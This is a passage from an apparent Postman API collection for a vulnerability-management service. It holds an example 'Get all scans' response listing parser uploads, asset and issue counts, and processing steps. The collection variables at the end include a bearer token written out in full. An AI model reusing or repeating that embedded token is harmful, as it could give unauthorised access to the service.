\"2023-08-11T08:47:44\",\n            \"execution_date\": \"2023-08-11T08:47:44\",\n            \"processing_status\": [\n                {\n                    \"step\": 1,\n                    \"name\": \"Read file\",\n                    \"completed\": true,\n                    \"success\": false,\n                    \"msg\": \"URL Invalid on file!\"\n                }\n            ]\n        },\n        {\n            \"type\": \"CUSTOM_PARSER\",\n            \"filename\": \"PERSON\",\n            \"results\": {\n                \"assets_in_scan\": 2,\n                \"assets_analized\": 0,\n                \"new_assets\": 0,\n                \"unreached_assets\": 0,\n                \"vulnerable_assets\": 2,\n                \"issues_in_scan\": 2,\n                \"issues_analized\": 0,\n                \"new_issues\": 0,\n                \"fixed_issues\": 0,\n                \"reopened_issues\": 0,\n                \"updated_issues\": 0\n            },\n            \"scan_id\": \"648b910d57ba9e69df94742f\",\n            \"sub_type\": \"PERSON\",\n            \"creation_date\": \"2023-06-15T11:30:37\",\n            \"execution_date\": \"2023-06-15T11:30:37\",\n            \"processing_status\": [\n                {\n                    \"step\": 1,\n                    \"name\": \"Read file\",\n                    \"completed\": true,\n                    \"success\": true,\n                    \"msg\": \"Success\"\n                },\n                {\n                    \"step\": 2,\n                    \"name\": \"Checking pre-processing rules\",\n                    \"completed\": true,\n                    \"success\": true,\n                    \"msg\": \"Success\"\n                },\n                {\n                    \"step\": 3,\n                    \"name\": \"Checking reopened issues\",\n                    \"completed\": true,\n                    \"success\": true,\n                    \"msg\": \"Success\"\n                },\n                {\n                    \"step\": 4,\n                    \"name\": \"Checking fixed issues\",\n                    \"completed\": true,\n                    \"success\": true,\n                    \"msg\": \"Success\"\n                },\n                {\n                    \"step\": 5,\n                    \"name\": \"Checking new issues\",\n                    \"completed\": true,\n                    \"success\": true,\n                    \"msg\": \"Success\"\n                },\n                {\n                    \"step\": 6,\n                    \"name\": \"Creating evidences\",\n                    \"completed\": true,\n                    \"success\": true,\n                    \"msg\": \"Success\"\n                },\n                {\n                    \"step\": 7,\n                    \"name\": \"Saving data\",\n                    \"completed\": true,\n                    \"success\": true,\n                    \"msg\": \"Success\"\n                }\n            ]\n        },\n        {\n            \"type\": \"CUSTOM_PARSER\",\n            \"filename\": \"HOST.csv\",\n            \"results\": {\n                \"assets_in_scan\": 25,\n                \"assets_analized\": 25,\n                \"new_assets\": 0,\n                \"unreached_assets\": 0,\n                \"vulnerable_assets\": 25,\n                \"issues_in_scan\": 25,\n                \"issues_analized\": 25,\n                \"new_issues\": 0,\n                \"fixed_issues\": 0,\n                \"reopened_issues\": 0,\n                \"updated_issues\": 25\n            },\n            \"scan_id\": \"6489be3357ba9e69dfb485e9\",\n            \"sub_type\": \"HOST\",\n            \"creation_date\": \"2023-06-14T02:18:43\",\n            \"execution_date\": \"2023-06-14T02:18:43\",\n            \"processing_status\": [\n                {\n                    \"step\": 1,\n                    \"name\": \"Read file\",\n                    \"completed\": true,\n                    \"success\": true,\n                    \"msg\": \"Success\"\n                },\n                {\n                    \"step\": 2,\n                    \"name\": \"Checking pre-processing rules\",\n                    \"completed\": true,\n                    \"success\": true,\n                    \"msg\": \"Success\"\n                },\n                {\n                    \"step\": 3,\n                    \"name\": \"Checking reopened issues\",\n                    \"completed\": true,\n                    \"success\": true,\n                    \"msg\": \"Success\"\n                },\n                {\n                    \"step\": 4,\n                    \"name\": \"Checking fixed issues\",\n                    \"completed\": true,\n                    \"success\": true,\n                    \"msg\": \"Success\"\n                },\n                {\n                    \"step\": 5,\n                    \"name\": \"Checking new issues\",\n                    \"completed\": true,\n                    \"success\": true,\n                    \"msg\": \"Success\"\n                },\n                {\n                    \"step\": 6,\n                    \"name\": \"Creating evidences\",\n                    \"completed\": true,\n                    \"success\": true,\n                    \"msg\": \"Success\"\n                },\n                {\n                    \"step\": 7,\n                    \"name\": \"Saving data\",\n                    \"completed\": true,\n                    \"success\": true,\n                    \"msg\": \"Success\"\n                }\n            ]\n        },\n        {\n            \"type\": \"CUSTOM_PARSER\",\n            \"filename\": \"HOST-NEW.csv\",\n            \"results\": {\n                \"assets_in_scan\": 2,\n                \"assets_analized\": 2,\n                \"new_assets\": 0,\n                \"unreached_assets\": 0,\n                \"vulnerable_assets\": 2,\n                \"issues_in_scan\": 25,\n                \"issues_analized\": 25,\n                \"new_issues\": 0,\n                \"fixed_issues\": 0,\n                \"reopened_issues\": 0,\n                \"updated_issues\": 25\n            },\n            \"scan_id\": \"6489bdfd57ba9e69dfb485bf\",\n            \"sub_type\": \"host mod\",\n            \"creation_date\": \"2023-06-14T02:17:49\",\n            \"execution_date\": \"2023-06-14T02:17:49\",\n            \"processing_status\": [\n                {\n                    \"step\": 1,\n                    \"name\": \"Read file\",\n                    \"completed\": true,\n                    \"success\": true,\n                    \"msg\": \"Success\"\n                },\n                {\n                    \"step\": 2,\n                    \"name\": \"Checking pre-processing rules\",\n                    \"completed\": true,\n                    \"success\": true,\n                    \"msg\": \"Success\"\n                },\n                {\n                    \"step\": 3,\n                    \"name\": \"Checking reopened issues\",\n                    \"completed\": true,\n                    \"success\": true,\n                    \"msg\": \"Success\"\n                },\n                {\n                    \"step\": 4,\n                    \"name\": \"Checking fixed issues\",\n                    \"completed\": true,\n                    \"success\": true,\n                    \"msg\": \"Success\"\n                },\n                {\n                    \"step\": 5,\n                    \"name\": \"Checking new issues\",\n                    \"completed\": true,\n                    \"success\": true,\n                    \"msg\": \"Success\"\n                },\n                {\n                    \"step\": 6,\n                    \"name\": \"Creating evidences\",\n                    \"completed\": true,\n                    \"success\": true,\n                    \"msg\": \"Success\"\n                },\n                {\n                    \"step\": 7,\n                    \"name\": \"Saving data\",\n                    \"completed\": true,\n                    \"success\": true,\n                    \"msg\": \"Success\"\n                }\n            ]\n        },\n        {\n            \"type\": \"CUSTOM_PARSER\",\n            \"filename\": \"HOST-NEW-2.csv\",\n            \"results\": {\n                \"assets_in_scan\": 2,\n                \"assets_analized\": 2,\n                \"new_assets\": 0,\n                \"unreached_assets\": 0,\n                \"vulnerable_assets\": 2,\n                \"issues_in_scan\": 25,\n                \"issues_analized\": 25,\n                \"new_issues\": 0,\n                \"fixed_issues\": 0,\n                \"reopened_issues\": 0,\n                \"updated_issues\": 25\n            },\n            \"scan_id\": \"6489bccd57ba9e69dfb48595\",\n            \"sub_type\": \"host mod\",\n            \"creation_date\": \"2023-06-14T02:12:45\",\n            \"execution_date\": \"2023-06-14T02:12:45\",\n            \"processing_status\": [\n                {\n                    \"step\": 1,\n                    \"name\": \"Read file\",\n                    \"completed\": true,\n                    \"success\": true,\n                    \"msg\": \"Success\"\n                },\n                {\n                    \"step\": 2,\n                    \"name\": \"Checking pre-processing rules\",\n                    \"completed\": true,\n                    \"success\": true,\n                    \"msg\": \"Success\"\n                },\n                {\n                    \"step\": 3,\n                    \"name\": \"Checking reopened issues\",\n                    \"completed\": true,\n                    \"success\": true,\n                    \"msg\": \"Success\"\n                },\n                {\n                    \"step\": 4,\n                    \"name\": \"Checking fixed issues\",\n                    \"completed\": true,\n                    \"success\": true,\n                    \"msg\": \"Success\"\n                },\n                {\n                    \"step\": 5,\n                    \"name\": \"Checking new issues\",\n                    \"completed\": true,\n                    \"success\": true,\n                    \"msg\": \"Success\"\n                },\n                {\n                    \"step\": 6,\n                    \"name\": \"Creating evidences\",\n                    \"completed\": true,\n                    \"success\": true,\n                    \"msg\": \"Success\"\n                },\n                {\n                    \"step\": 7,\n                    \"name\": \"Saving data\",\n                    \"completed\": true,\n                    \"success\": true,\n                    \"msg\": \"Success\"\n                }\n            ]\n        },\n        {\n            \"type\": \"CUSTOM_PARSER\",\n            \"filename\": \"host C_P\",\n            \"results\": {\n                \"assets_in_scan\": 2,\n                \"assets_analized\": 0,\n                \"new_assets\": 0,\n                \"unreached_assets\": 0,\n                \"vulnerable_assets\": 2,\n                \"issues_in_scan\": 25,\n                \"issues_analized\": 0,\n                \"new_issues\": 0,\n                \"fixed_issues\": 0,\n                \"reopened_issues\": 0,\n                \"updated_issues\": 0\n            },\n            \"scan_id\": \"6489bbb557ba9e69dfb48509\",\n            \"sub_type\": \"host mod\",\n            \"creation_date\": \"2023-06-14T02:08:05\",\n            \"execution_date\": \"2023-06-14T02:08:05\",\n            \"processing_status\": [\n                {\n                    \"step\": 1,\n                    \"name\": \"Read file\",\n                    \"completed\": true,\n                    \"success\": true,\n                    \"msg\": \"Success\"\n                },\n                {\n                    \"step\": 2,\n                    \"name\": \"Checking pre-processing rules\",\n                    \"completed\": true,\n                    \"success\": true,\n                    \"msg\": \"Success\"\n                },\n                {\n                    \"step\": 3,\n                    \"name\": \"Checking reopened issues\",\n                    \"completed\": true,\n                    \"success\": true,\n                    \"msg\": \"Success\"\n                },\n                {\n                    \"step\": 4,\n                    \"name\": \"Checking fixed issues\",\n                    \"completed\": true,\n                    \"success\": true,\n                    \"msg\": \"Success\"\n                },\n                {\n                    \"step\": 5,\n                    \"name\": \"Checking new issues\",\n                    \"completed\": true,\n                    \"success\": true,\n                    \"msg\": \"Success\"\n                },\n                {\n                    \"step\": 6,\n                    \"name\": \"Creating evidences\",\n                    \"completed\": true,\n                    \"success\": true,\n                    \"msg\": \"Success\"\n                },\n                {\n                    \"step\": 7,\n                    \"name\": \"Saving data\",\n                    \"completed\": true,\n                    \"success\": true,\n                    \"msg\": \"Success\"\n                }\n            ]\n        },\n        {\n            \"type\": \"CUSTOM_PARSER\",\n            \"filename\": \"HOST C_P.csv\",\n            \"scan_id\": \"6489bb7857ba9e69dfb484ff\",\n            \"sub_type\": \"HOST\",\n            \"creation_date\": \"2023-06-14T02:07:04\",\n            \"execution_date\": \"2023-06-14T02:07:04\",\n            \"processing_status\": [\n                {\n                    \"step\": 1,\n                    \"name\": \"Read file\",\n                    \"completed\": true,\n                    \"success\": false,\n                    \"msg\": \"Failed to parse scan file.\\n\\nLine 2: Invalid IP On file!\"\n                }\n            ]\n        },\n        {\n            \"type\": \"CUSTOM_PARSER\",\n            \"filename\": \"ASSET PROCESS\",\n            \"results\": {},\n            \"scan_id\": \"6480a7a057ba9e0f2bb0f296\",\n            \"sub_type\": \"ASSET PROCESS\",\n            \"creation_date\": \"2023-06-07T04:52:00\",\n            \"execution_date\": \"2023-06-07T04:52:00\",\n            \"processing_status\": [\n                {\n                    \"step\": 1,\n                    \"name\": \"Read file\",\n                    \"completed\": true,\n                    \"success\": true,\n                    \"msg\": \"Success\"\n                },\n                {\n                    \"step\": 2,\n                    \"name\": \"Checking pre-processing rules\",\n                    \"completed\": true,\n                    \"success\": false\n                }\n            ]\n        },\n        {\n            \"type\": \"CUSTOM_PARSER\",\n            \"filename\": \"PERSON\",\n            \"results\": {\n                \"assets_in_scan\": 25,\n                \"assets_analized\": 0,\n                \"new_assets\": 0,\n                \"unreached_assets\": 0,\n                \"vulnerable_assets\": 25,\n                \"issues_in_scan\": 25,\n                \"issues_analized\": 0,\n                \"new_issues\": 0,\n                \"fixed_issues\": 0,\n                \"reopened_issues\": 0,\n                \"updated_issues\": 0\n            },\n            \"scan_id\": \"6480a61957ba9e0f2bb0f1d8\",\n            \"sub_type\": \"PERSON\",\n            \"creation_date\": \"2023-06-07T04:45:29\",\n            \"execution_date\": \"2023-06-07T04:45:29\",\n            \"processing_status\": [\n                {\n                    \"step\": 1,\n                    \"name\": \"Read file\",\n                    \"completed\": true,\n                    \"success\": true,\n                    \"msg\": \"Success\"\n                },\n                {\n                    \"step\": 2,\n                    \"name\": \"Checking pre-processing rules\",\n                    \"completed\": true,\n                    \"success\": true,\n                    \"msg\": \"Success\"\n                },\n                {\n                    \"step\": 3,\n                    \"name\": \"Checking reopened issues\",\n                    \"completed\": true,\n                    \"success\": true,\n                    \"msg\": \"Success\"\n                },\n                {\n                    \"step\": 4,\n                    \"name\": \"Checking fixed issues\",\n                    \"completed\": true,\n                    \"success\": true,\n                    \"msg\": \"Success\"\n                },\n                {\n                    \"step\": 5,\n                    \"name\": \"Checking new issues\",\n                    \"completed\": true,\n                    \"success\": true,\n                    \"msg\": \"Success\"\n                },\n                {\n                    \"step\": 6,\n                    \"name\": \"Creating evidences\",\n                    \"completed\": true,\n                    \"success\": true,\n                    \"msg\": \"Success\"\n                },\n                {\n                    \"step\": 7,\n                    \"name\": \"Saving data\",\n                    \"completed\": true,\n                    \"success\": true,\n                    \"msg\": \"Success\"\n                }\n            ]\n        },\n        {\n            \"type\": \"CUSTOM_PARSER\",\n            \"filename\": \"COMPANY\",\n            \"results\": {\n                \"assets_in_scan\": 35,\n                \"assets_analized\": 0,\n                \"new_assets\": 35,\n                \"unreached_assets\": 0,\n                \"vulnerable_assets\": 35,\n                \"issues_in_scan\": 35,\n                \"issues_analized\": 0,\n                \"new_issues\": 35,\n                \"fixed_issues\": 0,\n                \"reopened_issues\": 0,\n                \"updated_issues\": 0\n            },\n            \"scan_id\": \"6480a5e757ba9e0f2bb0f117\",\n            \"sub_type\": \"COMPANY\",\n            \"creation_date\": \"2023-06-07T04:44:39\",\n            \"execution_date\": \"2023-06-07T04:44:39\",\n            \"processing_status\": [\n                {\n                    \"step\": 1,\n                    \"name\": \"Read file\",\n                    \"completed\": true,\n                    \"success\": true,\n                    \"msg\": \"Success\"\n                },\n                {\n                    \"step\": 2,\n                    \"name\": \"Checking pre-processing rules\",\n                    \"completed\": true,\n                    \"success\": true,\n                    \"msg\": \"Success\"\n                },\n                {\n                    \"step\": 3,\n                    \"name\": \"Checking reopened issues\",\n                    \"completed\": true,\n                    \"success\": true,\n                    \"msg\": \"Success\"\n                },\n                {\n                    \"step\": 4,\n                    \"name\": \"Checking fixed issues\",\n                    \"completed\": true,\n                    \"success\": true,\n                    \"msg\": \"Success\"\n                },\n                {\n                    \"step\": 5,\n                    \"name\": \"Checking new issues\",\n                    \"completed\": true,\n                    \"success\": true,\n                    \"msg\": \"Success\"\n                },\n                {\n                    \"step\": 6,\n                    \"name\": \"Creating evidences\",\n                    \"completed\": true,\n                    \"success\": true,\n                    \"msg\": \"Success\"\n                },\n                {\n                    \"step\": 7,\n                    \"name\": \"Saving data\",\n                    \"completed\": true,\n                    \"success\": true,\n                    \"msg\": \"Success\"\n                }\n            ]\n        },\n        {\n            \"type\": \"CUSTOM_PARSER\",\n            \"filename\": \"WEB\",\n            \"results\": {\n                \"assets_in_scan\": 25,\n                \"assets_analized\": 0,\n                \"new_assets\": 0,\n                \"unreached_assets\": 0,\n                \"vulnerable_assets\": 25,\n                \"issues_in_scan\": 25,\n                \"issues_analized\": 0,\n                \"new_issues\": 0,\n                \"fixed_issues\": 0,\n                \"reopened_issues\": 0,\n                \"updated_issues\": 0\n            },\n            \"scan_id\": \"6480a5a357ba9e0f2bb0f059\",\n            \"sub_type\": \"WEB\",\n            \"creation_date\": \"2023-06-07T04:43:31\",\n            \"execution_date\": \"2023-06-07T04:43:31\",\n            \"processing_status\": [\n                {\n                    \"step\": 1,\n                    \"name\": \"Read file\",\n                    \"completed\": true,\n                    \"success\": true,\n                    \"msg\": \"Success\"\n                },\n                {\n                    \"step\": 2,\n                    \"name\": \"Checking pre-processing rules\",\n                    \"completed\": true,\n                    \"success\": true,\n                    \"msg\": \"Success\"\n                },\n                {\n                    \"step\": 3,\n                    \"name\": \"Checking reopened issues\",\n                    \"completed\": true,\n                    \"success\": true,\n                    \"msg\": \"Success\"\n                },\n                {\n                    \"step\": 4,\n                    \"name\": \"Checking fixed issues\",\n                    \"completed\": true,\n                    \"success\": true,\n                    \"msg\": \"Success\"\n                },\n                {\n                    \"step\": 5,\n                    \"name\": \"Checking new issues\",\n                    \"completed\": true,\n                    \"success\": true,\n                    \"msg\": \"Success\"\n                },\n                {\n                    \"step\": 6,\n                    \"name\": \"Creating evidences\",\n                    \"completed\": true,\n                    \"success\": true,\n                    \"msg\": \"Success\"\n                },\n                {\n                    \"step\": 7,\n                    \"name\": \"Saving data\",\n                    \"completed\": true,\n                    \"success\": true,\n                    \"msg\": \"Success\"\n                }\n            ]\n        },\n        {\n            \"type\": \"CUSTOM_PARSER\",\n            \"filename\": \"HOST\",\n            \"results\": {\n                \"assets_in_scan\": 25,\n                \"assets_analized\": 0,\n                \"new_assets\": 25,\n                \"unreached_assets\": 0,\n                \"vulnerable_assets\": 25,\n                \"issues_in_scan\": 25,\n                \"issues_analized\": 0,\n                \"new_issues\": 25,\n                \"fixed_issues\": 0,\n                \"reopened_issues\": 0,\n                \"updated_issues\": 0\n            },\n            \"scan_id\": \"6480a56b57ba9e0f2bb0efca\",\n            \"sub_type\": \"HOST\",\n            \"creation_date\": \"2023-06-07T04:42:35\",\n            \"execution_date\": \"2023-06-07T04:42:35\",\n            \"processing_status\": [\n                {\n                    \"step\": 1,\n                    \"name\": \"Read file\",\n                    \"completed\": true,\n                    \"success\": true,\n                    \"msg\": \"Success\"\n                },\n                {\n                    \"step\": 2,\n                    \"name\": \"Checking pre-processing rules\",\n                    \"completed\": true,\n                    \"success\": true,\n                    \"msg\": \"Success\"\n                },\n                {\n                    \"step\": 3,\n                    \"name\": \"Checking reopened issues\",\n                    \"completed\": true,\n                    \"success\": true,\n                    \"msg\": \"Success\"\n                },\n                {\n                    \"step\": 4,\n                    \"name\": \"Checking fixed issues\",\n                    \"completed\": true,\n                    \"success\": true,\n                    \"msg\": \"Success\"\n                },\n                {\n                    \"step\": 5,\n                    \"name\": \"Checking new issues\",\n                    \"completed\": true,\n                    \"success\": true,\n                    \"msg\": \"Success\"\n                },\n                {\n                    \"step\": 6,\n                    \"name\": \"Creating evidences\",\n                    \"completed\": true,\n                    \"success\": true,\n                    \"msg\": \"Success\"\n                },\n                {\n                    \"step\": 7,\n                    \"name\": \"Saving data\",\n                    \"completed\": true,\n                    \"success\": true,\n                    \"msg\": \"Success\"\n                }\n            ]\n        }\n    ],\n    \"pageable\": {\n        \"sort\": {\n            \"sorted\": false,\n            \"unsorted\": true\n        },\n        \"pageSize\": 14,\n        \"pageNumber\": 0,\n        \"offset\": 0,\n        \"unpaged\": false,\n        \"paged\": true\n    },\n    \"last\": true,\n    \"totalPages\": 1,\n    \"totalElements\": 14,\n    \"first\": true,\n    \"sort\": {\n        \"sorted\": false,\n        \"unsorted\": true\n    },\n    \"number\": 0,\n    \"numberOfElements\": 14,\n    \"size\": 14\n}"}],"_postman_id":"76a5ba11-b820-4451-9698-83947c7339f7"}],"id":"50c97d98-9026-46b5-af67-329c16dd2347","description":"<p>Get all scans</p>\n","_postman_id":"50c97d98-9026-46b5-af67-329c16dd2347"}],"id":"b95c8246-bb67-4c68-8b25-3938f05c1891","_postman_id":"b95c8246-bb67-4c68-8b25-3938f05c1891","description":""}],"event":[{"listen":"prerequest","script":{"id":"5871eba1-27b8-44f2-bdf5-8cda6fae38a6","type":"text/javascript","exec":[""]}},{"listen":"test","script":{"id":"bd56e95a-22e1-4e0f-b3c9-b0784813456f","type":"text/javascript","exec":[""]}}],"variable":[{"key":"instance","value":"homolog"},{"key":"token","value":"Bearer d3f8666c-a6af-4a94-98b9-f15cefd7720f"}]}